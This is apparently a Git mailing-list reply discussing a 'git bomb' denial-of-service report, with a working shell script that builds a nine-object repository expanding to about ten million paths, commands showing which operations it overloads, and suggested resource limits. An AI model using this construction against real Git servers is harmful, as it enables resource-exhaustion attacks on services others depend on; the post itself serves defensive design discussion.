On Fri, Oct 13, 2017 at 03:12:43PM +0300, Constantine wrote:

> On 13.10.2017 15:04, Junio C Hamano wrote:
> > Christian Couder <christian.cou...@gmail.com> writes:
> > 
> > > Yeah, but perhaps Git could be smarter when rev-listing too and avoid
> > > processing files or directories it has already seen?
> > 
> > Aren't you suggesting to optimize for a wrong case?
> > 
> 
> Anything that is possible with a piece of software should be considered a
> possible use case. This is in fact a DoS attack. Imagine there's a server
> that uses git to process something, and now there's a way to knock down
> that server. It's also bad from a promotional standpoint.

But the point is that you'd have the same problem with any repository
that had 10^7 files in it. Yes, it's convenient for the attacker that
there are only 9 objects, but fundamentally it's pretty easy for an
attacker to construct repositories that have large trees (or very deep
trees -- that's what causes stack exhaustion in some cases).
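
For illustration, here's a rough sketch of that kind of construction using
plumbing commands (not necessarily the layout from the original report; the
fan-out of 10 and the depth are arbitrary, but it happens to come out to
1 blob + 7 trees + 1 commit = 9 objects expanding to ~10^7 paths):

  # one blob, shared by every leaf entry
  blob=$(echo hello | git hash-object -w --stdin)

  # bottom-level tree: 10 entries, all pointing at the same blob
  tree=$(for i in $(seq 0 9); do
           printf '100644 blob %s\tf%d\n' "$blob" "$i"
         done | git mktree)

  # each extra level multiplies the expanded size by 10 while adding
  # only a single new tree object
  for level in $(seq 1 6); do
    tree=$(for i in $(seq 0 9); do
             printf '040000 tree %s\td%d\n' "$tree" "$i"
           done | git mktree)
  done

  git update-ref refs/heads/bomb \
    "$(git commit-tree -m 'expands to ~10^7 paths' "$tree")"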

Note too that this attack almost always comes down to the diff code
(which is why it kicks in for pathspec limiting), which has to actually
expand the tree. Most "normal" server-side operations (like accepting
pushes or serving fetches) operate only on the object graph and _do_
avoid processing already-seen objects.
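
To make that concrete (using the sketch repository above), the object-graph
walk and the tree-expanding diff behave very differently:

  # object-graph walk: each object is visited at most once, so this is
  # cheap even though a checkout would contain ~10^7 files
  git rev-list --objects bomb >/dev/null

  # a recursive diff of the root commit against the empty tree has to
  # expand every tree entry at every level -- this is where it blows up
  git diff-tree -r --root bomb >/dev/null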

As soon as servers start trying to check out or diff, though, the attack
surface gets quite large, and you really need to start thinking about
having resource limits and quotas for CPU and memory use of each process
(and grouped by requesting user, IP, repo, etc.).
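
As a minimal sketch (the numbers are arbitrary, and a real setup would more
likely lean on cgroups or the hosting platform's own quota system), a single
server-side invocation can at least be wrapped like:

  (
    ulimit -t 60         # at most 60 seconds of CPU time
    ulimit -v 1048576    # cap the address space at ~1GB (value in KB)
    timeout 120 git upload-pack /path/to/repo.git
  )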

I think the main thing Git could be doing here is to limit the size of
the tree (both width and depth). But arbitrary limits like that have a
way of being annoying, and I think it just pushes resource-exhaustion
attacks off a little (e.g., can you construct a blob that behaves badly
with "--patch"?).
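
For what it's worth, there are already a couple of knobs that bound parts of
the diff cost, though they don't help with the tree-expansion case above
(the values here are just examples):

  git config core.bigFileThreshold 1m   # larger blobs are treated as binary in diffs
  git config diff.renameLimit 100       # cap the files considered for rename detection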

-Peff
